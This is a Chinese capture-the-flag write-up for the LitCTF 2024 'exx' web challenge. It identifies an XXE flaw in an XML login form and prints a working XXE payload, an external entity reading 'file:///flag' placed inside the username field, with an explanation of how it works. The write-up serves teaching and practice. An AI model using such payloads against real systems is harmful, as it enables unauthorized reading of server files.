[LitCTF 2024]exx

[LitCTF 2024]exx

点开之后页面如图所示:
在这里插入图片描述随便输入一个用户名试试:
在这里插入图片描述发现回显失败,我们点击鼠标右键查看页面源码:
在这里插入图片描述这里展示了如何使用jQuery发起AJAX请求,并处理XML格式的请求和响应。
而XXE注入的最明显特征包括:
1,数据泄露:允许攻击者读取服务器上的敏感文件。
2,服务器端请求伪造(SSRF):使攻击者能够发起服务器端的请求,访问内网服务。
3,拒绝服务(DoS):通过外部实体消耗服务器资源,导致服务不可用。
那么我们就可以确定是xxe注入了,接着我们构造payload:

<!DOCTYPE ANY [
    <!ENTITY XXE SYSTEM "file:///flag">
]>
<user><username>&XXE;</username><password>123456</password></user>
<!DOCTYPE ANY [
    <!ENTITY XXE SYSTEM "file:///flag">
]>

这段是文档类型定义(DTD),其中定义了一个名为 XXE 的外部实体,其值通过 SYSTEM 关键字从指定的文件系统路径(file:///flag)获取。

<user>
    <username>&XXE;</username>
    <password>123456</password>
</user>

在 username 标签内,通过 &XXE; 引用了之前定义的外部实体 XXE,试图获取指定文件的内容。

然后我们发送得到:
在这里插入图片描述得到本题flag.

  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值